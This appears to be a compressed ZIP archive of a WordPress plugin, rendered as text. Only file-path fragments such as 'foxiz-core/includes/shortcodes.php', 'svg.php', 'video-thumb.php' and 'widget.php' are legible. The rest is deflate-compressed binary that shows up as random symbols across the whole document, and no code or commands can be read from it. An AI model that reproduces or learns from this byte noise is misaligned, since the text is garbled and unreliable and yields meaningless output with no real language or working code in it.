3Quw&_+u|~P1+%`刋ѝ 1jw4?FOI% ",:ZaWeU~Ov%]U&/׃6/t=9\TWPM\Id%ӑn]9A/}(^T&1'[qWx >Mk4|h|$J]O 7]qV7LЁtwyp}O^ kL K=o~]үH1u)S mC4ˣ/1:v'|ոl-b zsU 9#賌0hk _GOg2I&7F!o'<q$ORŽa>WKR.P(& ht l >>[%HD-kkӡVX`ʱ/t Qy PC^k&e\ f3[8`+ ~0Y:% ȗ< d E7% q 2[m֐ЙZ{Lv&5sۇ*9#z]yt, V)H]բ!jń~<7(Zƶݦe9i)Wchdd$z:@W_C)(t"%Y_Ssr3_}pK0x`Ipk bsm>bԸu8-_vfOtry$:9ɦ2- _N` L2JE W@%}r{İy{#zgx0*-č{HWTec$|aFk|`Iz㩔,],ބ]&Eq|ltfW̘\.eBcH5fUd"H{Oᨹ gY͆ Bɸ&EaDY0 + :}nTNS$  LU|ﳬgvRXA/aw4&qwP?kUzZ++gfaۋ\R?&W MHc" Z$H |I0w/c dA5єQ =]dr dt@~&㐏 3A>3Аo:NK# կfBdMёXb=Kfx6lR$&lozO`T= [Dq$ 29^TMd7!vu+〥͑Xb>IHi\~ȥZ$Sͧ=ztAX\F.찵:O0M$#*6[Sn! E6DPSQ5Sr*#4g.A5죿Ĝ)grQI{PDr$*hͣ-,YftJܪ%=10C 22R 9@5JqSM?/צ\PEJ+g.yٽ93H18{ϱ Zpv'چxB˻z@.q%v7:f>p&gVd?^q,|eb:vht^'ko9U/z JCgWІX}r{Shs$zʉTZ*X+v;j,Ga]]D,1Ɯ2V391!}b~}"pPujZn ;PKFFTZT& "foxiz-core/includes/shortcodes.phpWo6~\a@vX]3l@ h(C $S*:ˆY>~w;]6b@o/4bרTv1B?(' 7{{=Wb+*_=Rkԕ*6耙"1qJz5AJcM+n̏JA;TW>|С㕦#eX3K\vh!1YGI8lWkaQyc}"ɮҫw4R7TfKՕT4K њH1V.x~DNxmCK u0#L& T` ȧ/P#ᶣAٽlUSHoփQh -RJP:Uu@EVڠhiJ > EGV@Oſ !Rc̷h^p>SaMՠۥtiΩz*F~Ao dP< 9p];w힙Xh5^x*Ԕ(b>FႀXKuw\*x<)2}`Xv Aj-P=eŐXMϤ^'a0L|D0)!/d&\?.#{G \LD\k+-\۬)D9 s#m0~/t^X[s߂Ň۹o3mW_:?[Ğb[p }nPX/Љ$gzʠ]#'(R1Bc6m/-$j`{Pq8@2H2\7I,b )N4A:J}3n?hH]Ć;(aX=ő?Y#D'ugf(a~;x !\1yf$2gErn\^ PKάTmʮY)Afoxiz-core/includes/svg.php[io#TI-d?`C)B $ٽ9,$[dخb/F}իoz7bvW/^V.fӋ{G7^|u44[}_^|[nѷ\-1ͧٗf.0ombrU-Wk :\Mn7G{f-un2_N7= j\y\mrCKꂾo-(G_ܭnVoٿ,_~}]!B^ݮ>ߋ?ޞXN!b12DVѨO)ݫݴ^~_8X]_F{zgӏ?|=;Y&bz=zػO{{twyN7ˈ=z\$=[{9 vR|y,=s1zfql-`{4e7j.3<O7[t><}zdfM֧Ԣ<軽]G )V~/c~-ж e8{~94/a!Wiwyׄ?͎ FC pޮ_=S|{|AJkIlz٪z䨛ZXU}}1YMb9{~9q-+~ }M{p:|>22rr>NP\\,) |W{͆3%[?lP^qhfs)fz#{(l(f}ψP6c6AՌq(oiÏ+&ogWs,lb9O)y߂Yav2@*]05@;-`YW'0޷l 9\n_zG;YeR0bHOoU* (Kqt=ÊěWoRڦqԶfOl\.}ucknqmh76Vi93hl;nU,$vc+];va\EDB^Nsm2iFz"1˫0v.f,!pK Cuf)"<%8 7_HCN{V; ^;K¢)@Yxb{@j5If3֟Z0uQM2닿X-pFLM٩Fe1Z%k_0vMfzL`/OM̒ϒhK+s4AO]<:3Tg aW:a:3T%~VR¤`agqLi&4{a !@ c̸M1l jGeNBC!3-(.&t  R=1KV<. }yZpTXP /A{J+k\"0j/nr+5ښ{8jŋl bhOdN8&D3皖łuã|OXMcR5jO X0w{6as9mCfX8j;.XI-7۔d:\ŇQvqbh`<՗NwytyGdgZmo ͧ'%wer OU@.zk|aġ {* 9}=OāV+ v,V'2T(bCѵJ(Y ڊpn m`a:+@9q#,%43`Z@rWeՅ]6 ~b\LFc] 5 rjŀkXwkw֚IXێ56&`` Tlt[&҄: ֲc *fld 7YM?;M0r3?!BD H7iS4ĵ_4=n`K. {t&$m}rp'&0D+TF(Otd-ar |R>oq=Y{m6yFt)s]|C8h 4<~%F" CX6\i٧DCCmmZ#j>+Y rF$e4-2lݹv6XJr73PrVl Hg]:oig4Ee=Z1(ޢb#(|W(_7dD]cV([F3y3 zig@IҁABhh*a_&yEd`P)+_ #XU34CpiLQySa#kZp7o-)Mi8P**C~JUr5"]C5sPrT8aBRVg@ ͸#~[RԼd'ޭָzsRǶ8rZwD¼\Л_O7w&-⌱J=z"[Ăz?cBetZQ򾥤 a% z)E-ZRz|uvRNYC IM-& 6̯Cڲq{ҡe7v,Bgezdy "ʏeXo}aSHGrE:P81 j`|tʏy R&=8 d4B0}`dt goVwn~s80af쫥(@m-7-n̶RSogDm+&9̤gӘC+`jYG'DGKi *"TP&O#F~\%-@ :hb[LDe{NG^r%#]BszY[3hbq,Imj Cx Kʡ-ۏe~4[Cp 0*Gx7rg%Xm u*;g(ʀ}ԯ3ԩVI{D56'4pF [H^|'@wb1XbkY DZb`[n42ܺ?bսlM%aNeF#30u! 5A {A i\~ OtMd۷$g mGaYh-2m+B,*x{!?GkzoݿkTeEPyBֲ4&wrY2Ä_y)gͣ8Iš@L- >3J{R\Ⱥ# }CDs4v6IL  ć0QTŃ)iQ*1m?c@gZ]6G;SZW>֨a"nV9%2v:;r}%gۗRSijZ]{b.+O` $R΀=a !(&z`1Kb|0[XfZj.8Ki-ir&O[󭆎!,'y 9ys[Xjj%\+O&sT hW |iv*%(E`|=͸FѾQ% k5DL r!>[m|e_=j '1 T"orSXX͠u%PB͚j@lb_rP,u{[EV0"2nTTᡢgmcT20sQVxRڰ 8fk~.7s#_C]OƖXҮ`| o{Be'7E iys.:GiӶcroj{wza3H-A!k#`tHH9MEX4χia%bCkm,Jǘpy # o¶vFP+Nو:Zɽ"x{E48W0e ˤ|L7-/6ųO(P ҍm񬴲586%)YzqKWFk},69K6I}=rg?^HXeProgy^馬kD9W'uD#8x_}vr/)k]镬M{\+-d.ݹ\bf?s=vcY'FWg?|CH! IrDR |-ș> 2$!=|(s+L0e󰦑NWKT4k .:?}ƻ @k\'$J =qAP|T`[ӏtbwMd'%/q𼯑b`hoO'iMש8Q8ry!Fz󆗷2&ܚ~P-3,BbMɥSu+BS-R#E{q~~eZd ̍TQo[ ts.maVߎyƹKA߽vGH~[HF! (U0]Ñ7r4{Gn` c [p/XbFll8]AD(Piĵ>32I*\#r!tl 3eF@Yڵ=`!ȀQ$1z|4⢿HpCu`振awWvɹ7V-FGnqiN36I[ps"ȡl[ _TnL~2bt1p[2%*n\4Z$Y;!N+lIyW7E{M!!m .}/sv.sD 4ώSw)nMD*.}FAP7ozy;sNR/ (>8)4e_~"ע7t4 ]l=zRtY_u<%(Rv-FTc56 +j16aMӆau\:kqoCIdy; XZ)2l׳& BHlP#xA5h,Rt', aiB5c䋷XԢ4J!~P|n0vYD)S6 A[_-hY#ab=&6hM E=Z܉4B2Bb- rLFCpp @NW3{bfQ-<&, 0xՌ5Gw-QR``[Njc fJV{kQХQ .bRf^yH)z<ٚql0JC) ,ZOMpL3eB- F17.65mԨ9E3Qw ލp8lZsS>c20QtaZ1B!!uU͜*$]UdkD-sebY5D=$C^ ާy& 6A{0t WP3Z.Q1Gk#-8= 3FW! f31C2brbb/ U,Qƞ%H~3T"isfz ˹jF&"!x00(7~[ Α2S,P,(=lKHR)ԆAiX1d5D6'0[D<]%PhYsW윒/vocn!:Y`ENxA8/< g?FbQ9 崐ؔpz@뺭0FYaʔHJgE,5XhTBA$P/-V,*$4FNxR d wb0OZ"=axd; x|@f/&}9j۞jE`pU=VZ06f,0Bb KAMT.0 f*!FV@1rI",QFQXf]H Uc]& {9$޶X-@ؚרӤXПcjPB;v\ G,n*!'o*R$EBC rׂ8NX-Z'R7 9H8]D4Sly"Eyb w 2 C[aZh1pZt4֊&bKb忂;^j[MXSPZM(-Z@LT-pVx݀F"+}sb_/HHt\%:.ӸW E t$D7EvH^E5UwUUUDw;[oECz@5@q(.1wHkarI8NrEq+88zdIRo%Ek)EϪXEݚU\|\paW$&Bt_ݍ+}` fdX̨ wuYNt!+,+ۅTҩ]{NRY=4j<ܫﷸEMҭ^}s}?o߼h_D^ /iJ$׺OJ}z~y@+kڋrG 2W(O>~擌`3Nj3 xw[7Lo o8197qYmx#]ozz7W/x?,B6Zfc9Mڶ`r?|Foh_q 3V ϫ(k9K1Rtbăj!H\2,a)ZYc!~%ފQM~޾GwwlG8 ߄z i/&q磤]O#yG#Z5/jT΁5[#Ɇe!, rɦT^s_]QRxgX"4}raAjE c_.-Z_#^ZT󢸂OҬ=yT7_'p`/P!T  =A r=/ W^TԢ}n\(G3:\-hlJnjz\[c[#qQ3߮v{=KH"!MTLZH8p_I3³s20OiNUS&pC*Ĉ< .GWcUrr;(k;o2zxo˷V݈w3}]$:rRs1gR-GēXDvH*Pc"^b0lm5B(ϢSeop}ͤ0'V߁Ӌ8 ]FșT PD=Ton`ܡ0A1ܠ1K!j]e0mj?Jm:EV-EaM~IwB+jȣ Es5?ש`Q]] !*(VG1!BaS~q۩[:\aߍ@ǿ)Rxj Yu8b,|VcuvyzR9hJ,{ğPZ ݘBU{tԵ]ch 􏍮tNJjuQ(9Bы.Ri$Z<Ksegn-I#C 6G"B.l&8zl~ 1:X8),05ͫGHsR6R3&y#)w[7&\a?uOu髦w8*THdN},ҩjX3dIS#D]& #V4:s,abyŽOUt؄f0O!\Ä,-ںFsٚY<Ky3`RSnDzIDagf~Cl6wwcT^従k,` Ǐ/K[ 5):_#V!_hqL$P<ހs/dXIơeIG$3xK}qWޥ~0˪}-8E+m\(Wb f}pw`a&٤V&8n#bZ,%rd'FweSH_hƹ'S1P6X ܙO}1L0V7]g?8eLmiR@qj]A8 fH_FO Xĩ-&43D"v1|L@TI1@N`KW.&&q٤46(OFiJtו)gix!D2O!&UZ?[8*)ES%jpvۦ@֌qp+HEX]Uq=Y`|-}*{nj6F ;S40) .kD]͇\s8AgcTOq j&p=q7%kaOL@3 %?xEV)xt xES]1ѡVAA?G&YT#8OWVhlLͱKnV]rz0 @@ґcn3.KmNC~ޖ_$ ƅQʞr#xXd~>on~?m_~Hj)#]Wsְ:B+tbFX/Āh^]/A']w7L  {wpa`I~wq~mnT)_~~[e´z:ԾAF'-'B0j{>x[R)4~. aR>1^^ױ@,@`C)PrxQXUP[{nz3$VЏ?_)d? uwB7ή)"߾}!c7?m`,WE'}S9yMےŽe\\b,g›L@Qu{C8.B`BV{X+8(S^-Ls5=Ή` jW7ןx Z(/L Qn/kZ /,*WY:yfƴD0+~>nu_h8o[,z;/Zo^};6z١Q](`[5 WR",ESPkkEMU;$@jUd֏_~"gTLDHX$p^ᄱ?:l4~^$ 7(FC@AP]כֿAW״J"Ttّ柠U TݿFvs*d>5~yz\Ր/jxX͏׫{:^,43TIτ[DK3ޜPm+;7AB^{nzFo%`k#TFN?R ]_ .LupN9֦qkYfP-c9xZ[9xeT?}zlIV=Lk%n?r9qs!<+\d:K['iKe7,zJ[>G%¢]ĒgjM֥3UZ&uFTx]^NX^Оo#}"u]fa՞J |€"MI^<=7?Vz4*`Y4?w0^~kܽJ3sgNaOݯ#88{3gigr:)}Ɵz(A3ocM^Gu/p˿ܕU+*g<3³WWRq^XT>vۇ}9rb̑s";g4W?\*5`kL,/gRUaV7F'};h ~[>P&X ["@bFVy-{WlA秙<b7 @ 3t=NUIl[\#?(uۏ G Ea+-*?>o!?n>{`aX}U}.h1Q'p-Wb., ǏMυ*atգr\t -f)rec٣8# bnI|iʔ6 i;eB3jIfE UԒVڻ+ɽmio>b otX)w69G_2sD_+Ic_nU!v첚,=if鎚s(=Þ nNn3qЧGԞ8X>ɰŇ_nn~E DKRǀ [mnɖ2,]ȟ_>LmMm#-"͍O 'd$gQ׾im0% ]\Uz=En50WEHa}'dMMONkB'{D.Ț9M|MCX_7h59S\i#ʪr &ULs H$ -rvҘ'Q%Ҩ:pQ e\&a`MǓ{b0=Uz.b9f׳]ڤ5q <A>qWaS :pɻnD$Kq"ɟWJ?/mٵQkݓYOYwd2r59#k<窾t}$ ^3m ~Њxx *xmtvGδy#ŽztAh#z?0[]x9YJ9N%l3v/4GnϺO} ߡ|YE`˅IN9&Q`Nr:1Bs9rԋGL 8N빥A:+s,'>le.u)`Kҗr7rU\5qbUS~wi3wfƝ*\_GppJ9x;Gs^rp.sG LFU.3W83ϡH3>H˅~Y.3UO.s&y.rksgoaGH_\> gћEKK~3Sw"j¬FODgScE_{:"@gܙ&'2) ztSk!S/btV?{_{Y)"Rѓ9|.9N6_K-F4.Yq}>a..tb2@Dv.yJ1&xN1!Ɵ('9q%󜤑9U*Q<w(GQ/p =.mpx^tڄU=>V̕>9*}>gȋY4!?1p~k+Aܽ3sg NaOݯ#88{3giA|:g_N邳uVu"/p俬7t#~~jKQvf7 @3t=NU1$Il#{[gױ8+m^BN:jWROZvRG٣8# bnI|iʔ6 i;eB3jIfE UԒVڻ+if}mVm pKw;%x/.F2(C~(qsK/խ 3Δ]VfI['5;lgOwԔקGL޿FwsJt>=<9LrO#IN>2hi@zVA8)0]p* _b a!/+Ofrʙ2OL:uږ-Y>,#4g9K%ē: vjW/fP♈|8Kgx@Z"|DxY>g2A< 3~rw< od:;ә.sA\x&9ۧ$K's v44 =y+ $|ɨTW g?]A<&swt A~x:]pj|Oq&F^V*Kgݞu. El~V98w$ )N'FhNq:'sӳsvD-َ툇^\F3ڤrʹg_9=*j̝;qg.y8hf<׭5\kz'g5azA;qi9󐱟#9X;@Kc?{ 緶+=Й;3wfz=1sp N@>8)0]p* _b a!/+Ofrʙ2OL:uږ-Y>,#4g9K%ē: vjW/fP♈|8Kgx@Z"|DxY>g2A< 3~rw< od:;ә.sA\x&9ۧ$K's v44 =y+ $|ɨTW g?_A'W8y_h#/+hnϺ?gf\@?Μtl#489P;"lG|vC/T.|mRkfڳܯV^Et̝۸3g3eA< -Z>g"A<,3U |ϙ\?9;Gqxv S LL}} ;@xN.AdTazxs闛O?xv OnG;*y/spvkJ1_ J8TU-˙K-V(&<,y%wtpVA^oKq& ,Z-h7W3gBiebŮ֗[(rVbeSz3 }2J6ke)]YbkPf,b~CR VbSJ-xz}iu)H@8t@/i t Rըk#S5.v;]clΘgBS{g@(B SEsJ/0LsXm#UHjA>O5jZ 2M#l(+eN=lwWqFfU:Ϋz,Q̛:'dcj}E\P3/4eEcwxL[Ѧy# zn 3*#Ɂ(AKx#Qh=+j9B> n0B\66a54e)`O0^*ח=DLFgN[{Wԭ5`"ޢm.(^3:[27ynq3NMuS/# "_U㖂\l{ɳ MF> :5q=_*?5[#/vt%#1Hkhq:h =mg5P-҇@^s^uPs-gS[ÜDEG`v-ݥYp)qQ[%X'@y,m $Hbbcbbb1bS"ErW)#)H ) M+rnLxkztGjU"ҮUi@`*FjUmq8sCZet sP*mhrXXJ̴*loD; vZhTHIQS.F5Mm!$5cH. 1JKbbƗB1fm"j[HfA7[0eʚ/kQHQ%\b7HuXXjDo-l@b{|ܧҵpiCסӀZd3i4,FE.HgU έcɔF.BN _,h~:ef+Cu]bb.hN !'4jbҁ<$L OZ\yyS,((צq1]Fp䤩w:EXx۠ (kaz@"!H2bjHr#>c>-@첡FxvZa!Rr-xP3P̰pQJPW 3?!\u ͛ۛk7ő8zem.낵5LMU.G+jGT|5 99j;CFpOyܛ*Vj,;mUr Gh:Y 'D)5_[dxj**eS";wQP@>6uKz1X:x7Kif,У& `q#'U lty<nt튷ԃ, ,rMX/Ň?|U|nY V4ׯ> ߌhƋؿzvprx Z./jJ2rWDF$Rt IIQ> ~ CE8jьjzY 0D0e/BD1Qb#SJXlt_4\o;4CbmDf2k:%j8bP"܅WحW,M#!^DV FBU yA%?wboD=bTedj(k,C?JXe>ABv.X}op",o>.>ٷFǣdBC\2oV(ЊmNV0c "D ^v!0J^0. &%&=5Ut56D영`AKu:ᱦP4QQb_a`BJ+2Ec1a0vP՜& y XbvcΚ BW`p^QW\MV4fFUW_߉vX'v [ze# \ \(释$sM֦+5qGL{\9lF4>PTĩŇnq*6XS!)ab} N1"|H0:az-Vl/B`ff/t@@(B}/E_]ɛb*A$XL2n)fHS'dW/hdaSݺdhKmmJ /8gt%p_c3I.;XUu{=FD"`373.BBr̀%[^ρU=[ٺ$G45oTjV!,S.E#`5F + ClUB ?SB԰䱀R9ZPFL8DA,q˄ w8#g6GGkbb]ɔv3,Q{I5p'd:iSf@"IA$t!j}l`.:4l,C1w/)y-KUii@,DsR cI_\p(ld8{w}S`'_Š{DUP/*q J$ :];?|}w1[|ga詺\[E4)lkq\/e;?\w¦x=뚱2сo@%CRF{E46k$]% 'F ɪ=UV|6?'0 Mp1]p;r+?xPB"!qPKTɸ&foxiz-core/includes/table-contents.phpYo69XϨԊC}lvw̮A,}ByzyV{gDk!"J] 1M_=  Cۃ0$I C#wYCcԦJ]LƨuEy0 $TzvG*("K},1:R0-GxGRbc^:+ Og|^Ϟչ,|cpd~A^іk"L2ٯlk R[p[:Hk(UE[6ZK ehu*X°2%UUKsxKGegdh!,sЮD;ޡJ|=R2+N8͓,3V*-

    /^^/'r)/3A|z9p6+WεTW SʸɮI%6RCX~(#QmV߹StMˉ*YڻhQYeyi&a B@-NNC#7vU%H@ǝ40R\Y=[s/p)К۸Seg}]I%3wv*iLJi5|iӪOU8CRP[7)&tCYDǹHN =TmAZ"i9xa;o.Ji$;fmRpS7:\@ EV SCB.</o bB?//PKTpB!#foxiz-core/includes/video-thumb.phpZsDٙpS9rh@[C)t4=tdn M"kݷ|=]mzPD x{tEdFS wg{#הnvc0B#Er1> o%jH!D H{yqDqi44$hEiiKƒRspXz34L#zTë.ȕTʍvX(Һ'ULHAf /!DipXC^ tR>B,e_i =B/f @tU&&"S*J5~xj;*K2R G-9cW=55 1ד5ܡ5a90-Ylgof.mI'YEr 7N}xVڜ"; Gl痺 T?8uϢN'5e&!0D:vl[v>Ω|ޜVDY>ISYĉ$#d 78%XE*= ч訔0/IAg+OJo)×$KzOhc 4ʮzv ћoQ<Cd?FтCBwu( `V(2w'\}O@dI,Z5}8".b.PG~]m־x.6A#'fO];=0rfsx4$z~6Kl L=?I׿#!$S!M!pPKTH tfoxiz-core/includes/widget.php]koܸ<AĻt E]X8zL%NS$EN ]}&g/׫΃'OЫ89/9Uoj]Vq 9rT0.+__B9%9B:(HSŠUk_6 $|C'h~fG ]':A )0乕#F >QOkpT aq)!HG1r1Y LAyV&gG϶r֌ -Cpe#>d?Yr2-PJvft1^MUq$z,zŤ>>0UjY-WN`@;R͞A[nP-({羭i͎3x<2i!D8Φ<3M樀l.j=u2]U|4)0g fa*a5Z]m8bZAqM5!rqnluҬRbE)/8zGkU&]v 6Re^h1.Lu/=}9ܔi#$!wd_Hw{\%R2 2aK*򕭟aOe8乹Ê-DE |t׈]f|8ݘ3Vz7V`/\eEJr.fZ[ pER"UʹT<(ƦSYO(~xm!rޝҴw^υ~QKlAUQqd`ZgJR0R*MʲO(^5S+#R}tӄ,+/<"5# P_bqX{lmAZ\Ok-)X4Ep{rs?n~:;6ӈ\jڴw9 8hD n-݁1"Tj}DWixEEj=;$F:_U](1mwrl;p' +|Hy>|QozĥDlL>O Iܔ-#'8GAׄ`{lInAȶ7F#f +s3{ĥx;!KHɕ)k/j9"w|#KY9+ јJ*7rtljXL媥2;ߏijyؿugͮZwy9k}$.5pؖf-Ɖz-wjɰvs#e7 ƺ%VgvWQ/Djw%{ĉ}q7Nfa$TՊdfZKŗuv"='róaV: µ sr8Vh`Fy4okRumj!鬚$3jɰiNV 6b}7--C&3z1-;N!I`Sg-NvuFʚtTw1cz.Ju"Mh<,3Q〷6>NU#\n9qXEB YT>bJ[dòdٍ܏yd-Z&Iw&&t͙olS a'Ni~*M1[0vuKI7z}ԴUI"!OSSC4=§d]J ꤳenw-B9*{IsH<ߩ1ÿ{=M Brg2yO"%MӔPiٿr%Le01 ^$iW$B_-))v8TMLQ\2gWc*rX񼭲_౶3|v*ا! U'qNr!7g[NM)IDY.I3:{~G'-qHy~aT)Ir$㮩Iyz_xa(ǿ肂$qyPrXbUA7,Θ8k!cY!)(6P:;ӅNb~ݭ|rK2SXɃX4Tߤ knٿ2ON /[pf{ ƾCƷ W}fu:f ~REEu,"PT*؀.>c}FCF#['c=X99wDp:֢XsW(:*؀j+dvݚ= ]R]Cyf{zf 0-Hj]ٚ]Cy;$~vG}ofA$ήQA]`2!ѸknV3o1"^m`]- ̬}}bry;(~]wG\+?sJG]{AogQy8'x58\b}E\-n"YD8% YA]\]sbjmH/+@5>|\7$SdշfOjn=ѯ߲Ksh^Wm;dQ0/%,wJ[ MP${_)GEX,2jV"عEںW fj}u݁-7נo^AQX{_lEwg#E&w ---cBΦCSQ:$( ŗ憟ڿ!|G$=[\dq?ɹđ"_ٳ#Z,۔Oُ ;# {qd"bU?u>Q䣩ߦW- c'* j^]ov#+ZK/;X18D7 @pQmUGO 5 14jM;3 DZ}0wthB: [:ю,mH{|n?3ai7CՉ_??|f.q~Z4K-?sՓᆸ',iǞpZa Tj@3C8%7kr@/w?k0:fSǷjXM,~6P`MDkxͻѬU\l6 LVd Qя,aUʂ Ή{T5نSrr"F,OI毜3"~zo^YuZf>{#>%u6͂CCg_}eg_Ssr뺈#Zd'-L~?]ZT-?C`m`do X|wE"lҜe+;$ OIŬ뺧^0y:٬7^bucys-Yc[O޴if=^Y<%#IZEHIbOi:I7 hA!W5[& KP(j_4Yk7c(;US~MdyO˹j'c%C.˛Sy.,Ow((X UV,+$<6k|#Ɋ߻& i70u 4I Y Sg(=C388P⎧݉Ğ P5hĨFI *rxnp_%5Upz{CTdg0\{4 "P999W(Ln.z #0XFZG-idϼ9˂FgĽhG0 XN,H;"8i(]u k4HƌhUdd#Ѷӗd`,!y,ϗePOu!48\IA/+`yy'm SX<˚4i){uMk mXdC& *J" ?GhYiBap~=%-_=N3@W=hrÚeX-H2ٹ*: bpqܐ l<*NAC2%"s9n7z\վr8RSe l0{W ҝ6ڒw4(h^4 W|GBӽޅ+OJ?nx-Atg8kdMnƎjX0wnJ{7Vz~B$: Zh^m[us*ٗ E~_8%e;W'7HeA,~D|݌4a{VP{V)WSf várǏpV9ڒ4a -w'1? [nmDhSn @r.夃9GXcvY{ ^ %X(nrѶт|iK"OZ OmaF} dJ6,<0 C_~,N$q9]UHgu!db0>vzx>HpCp0 ̅`4\hs#Js<ԭr1]dfD T@ mT8.v) &6`|"10ZhLqN<6k)xj`W>b=(,Q!/0ZfՅ1ͤBpvGwepu^. % 9wT~ȸ 0|!T8RkG"LcX+ LxEog==9ԍ_}II11C 8J0t/! @/Ţ8/ <^'ʕH \8rqF?j%]84'?wQv 4h3 * Rڶ 5RoИ=廁B)}>\ŞeNt~Ɩb#Ssq5m[306fW)ӣ;1 pGt7U_OGpY!;ӜNɥH K%уu@,)M?VUS?(\_&i{Ƣj~aZNV;,1N/w2W,^&y ? [SHIdW x&$=j}ې-ڍX_/Ugkv: LGmJx@n~?+y|}i;s7ѢC]w&;篙8h'_{i{"YRI(9SrY8c\6}cVO 7|jD%p'Vߎj1`9lӹT}աIg2P(>Q W\mSِ-Vq+wҤa zmYIEmLgm>d$ oT|̆JgUiA$X(Ϧ}u$Yr(L[X>4Cf"W﯈vftBLWn褊d'o< B;k mXϪ}l 17Q骏N>C[@1\9ͯ"YC ," ,A ^YPx|Oξh *DM#E#{B'yvW+} [uX=P>YȜWϾvEeo8vjG/34G AVc`C?v|LXӂTŷ^3vu.RX 5[ Ocӡiy~H^ClKL?8ٖ"v-PE]^i}YkP['p (LaBl'=xjjCrϦn$yaG|І i5.~$Qߊ/[f yv_hvasVNPT0^WeqPopʍ.䦢r($;B.xHjNIj*kHr z6C*҉SH8q)?;%=L~t4 8!k(2ni@RxgY"YF[Ed ^Ƹ'aB ` )_|{ 95U:Yo~yhŠ 6EKF;^dh[p~Lz\ Z]ӣ ;w ՊoNnT#xxυY_vR[x=>[' ZIjqWn98GlF67^MXY( =MU}f1|7:!+9%UqNӨ$A'$ KRi0 1ޘZ914Kr? 7OWcAD; ?|h8F_ RXzmNO"It\ux3,EmY qb k}m|TKRX~sd^`и(GAd;V ƃ2-NMZӔ G;"]Z?FZɷ@"g-^;1?rra)yZf<]zxAWS8_ &DBST0(jj66h9h.DO% ݥ-R)g s-M"e >7xJ m9"{j\XV?=q lP\dyYOMCy@lOY .D,t/OPǛԛchwa0L 6Uض m:vvݗ5P`+8C1wOiPFɬm~{vsƷZmzvs];sp¼fZBJ̝jjiM YmͤSk} lxg*r wӪlxxQ(BW';=nڳ6xw|Nb 7@ou?ڡN 98V{b_3W$Lv՘QAl58޺v),oH*M[o{(v4ǤueyώA6e5mZt5X ?zm>Mbz#ԙ>)@^jx/lVVnC>ܶӃp6=x6 vq`l{m-*J$;AxbD ]g<~C;݀!xmC]th/Сq zrN;T.lhKej˥ۺ:x4ѡmq{a;5UոWXC/4 U0/:4<6:"AСAW( tО.:4rG)ܞ v?dž C4P_ r$<r:T: D, tq3?@~_՗2 >'L ~'A/'`XcdᲾ!i/ۭQ̣KS&SUBJJXqFRW+!c`r~OA;-w]Dx:.fchE9;/S".wg5ֵ7x`sFε+?svs{uVw^ZX^m>ݼL=ޒ0DM  >[hٞYcYņlb*'xCW^Zl: KX )5K};ƞ*h$F{Ezp@eQ,7k&?#{?;KuQմL-7t8a뱽EAu'bzC ;|~L>4RD|XގǏȆ4"vL"wpT0/vEq' 4ON* ƽ4GvvT8u>z8u/g2Td$lj?%;6roWT}d{R=<2UGRϤgսk7( ȣ*_=,[UmLdWewתj~>5qLbAٶ]c}G%Pvs;oQ7ߜĶi Ko+WpB HM|d`״SҠؑ8Q]>G#䛖Za=&"k6f4!A_H`l6alypH K_ĮpM +4׬i"^MqV~H3!N/d38fRj$*Td3ʁnfr#,tcL\ 9AΩj$Өlʿfz(F/:%.0dI\XGGh Ciu'FM:n'ױt#r[US(Vt0Eg F5<||z֘hj|H5lH\8kŻTft*E=U唁&5'.RRRoQ-h檬p'# y#@ny17ȇr**k7w"eTN3BRJ5,KE{ s O Eֵh="yosK~Y 0gV矙܊٨iyT7F\8R T]]izN^t?LbG$}DW?i;ꍭ^;5gV`"4ZL< ]x?@Ѝ6K! z}cryC^H/pX~I{ccaxj1+!]Y&#aeo&z؎ޢ;/Ҧ}J`O7h=A%- duupl&a2vhT,mʖ1+#1}\әZ4\zȫ 6_Mm}۱qMU:6s!!x`MwϿ0gdAF #n6r2y5'!ѿYnxRnb,z;Xnp̼J:DAuUCG?yYӪ>5,;f37 %9q:ޜu8vȣQT:q=|('d?>Q6`rC`̃G|mA܏_/D.ң×e4UZujzF9D`o'^Z-ukNPg=Cuc)'mv@8نA849f߈4Xx\|6gn3j838g8|l"J=̯\eb1ۄp`6c3qe6lj9uۅ2 0,'fRٜmteK>8(wTS{Y3Ĭ6#?jJ>ay1{{$rlGԜɤym 1:6^r󊑧s U^HMb8BxpY+_oC>W/JㅠNf|ao,˿4S^ቑp1_:JZIHZ Y F^yRעx~FPHB"!c8T*pM'&r77Sb*d紞{ 2 !  4=c*5Q4qKs3wtcL^+"ŽXi mtѹ %GS!@qŁ FOwlEGkV.$~ >塏\ }_b*;W?Š62ϼZRqwB8+T?%}CaHCAdJ{"OOZ;!R |j׿kW)4f"оV5BC5y.\$"תfxfC}~."|jM׿uLW>=~ Z{= RFt"]BbJ}`)qQ\ g6ʆikbY!ĴT0Ķ#T)5{S`/ yJM فUV:Z;\5X%; (Ok͸&N&rg` FM,q X2zS}80Ռ !C X71dX`kyN'Y!CR6!&Z+-y>LVe#!\%g&aM4dơ ,r) ¬ ¾Іx:Sw#,ތa+w<,FOTAqT )$L鵹bKϗw{p˝&,CԞ_mCB c"A{ vLC1\|kH&ޘ|#|9:;O~=B!45JL.w&-Hg7 /T? U5"M- 2uG)L),۾p;vDFP=BiIEjk&.UJ#eLy_&֑Y Q<6 IJ@ j\h7fb b wh-M5'lqhHDZ͙T#ed fbyV,CH3Vt7=HϻxwGybd(T eşܣya!ńd;P& LL:8 %xQ&^A"v4"&$o*L6LZUXL85AkP.IƇ"N&7N=cōzV-ʍV u r#c7NYes#>Fz[(cUgn7:YmBذG ɺR6 M;8^=dJ9VW}E4z^@ Ǥvz9nx$ PH,8Z!Ѡv^̜׈MCB|@+54v uXD.>tLijh(8$Hh#wЎ>OW@Lu7zV B`/ S=n,-Y(o,͠j'y{x#JE٫& 6G+ρhTCh$éiH͇pڭӞ`! SɁ}pkaKkї^TѭK`Mp]rƉo9^3]|?t94)͕1PG#!qX7\RԷT1χ'9mDeїiU#޻ҨD&y KIMA$dh\LF.6.&X}/1ZWkh{E9->z_N@re-I%h1F %~v4"F0,H>|<_JMhXifhLBFH#&NFJcq zƘ*du4""T/Si/$L Lܔ!~qEڠCL A<Cc T*8&6MYh#]G1jcB x=i$.^hvM3ٜ>#45r|>RCy4A#ЗzP^YɳZ@_nqNc>mes2IZC %6Gў`qyE9j!B y0GdjK.6<ǐ>n ]js53Md\TG&i]+x%LhO0sڈ<Ԅp9T,n* 7}E~2m`nj|Dq5³9Md\ĸnrqHjC]%Zĸ)Ss4"kWŭv0MU*MzNF!/Ü/r :/AK:,$>tUt̩2f+_?(/\Y%b˳x5.%! f(0۠ ©=lHCazM-=+i^HhD C cI5!tϷ!-O-RV\v zDɝ5BI9UFVSzbZZ[3D$EK^|2SCoP5HN 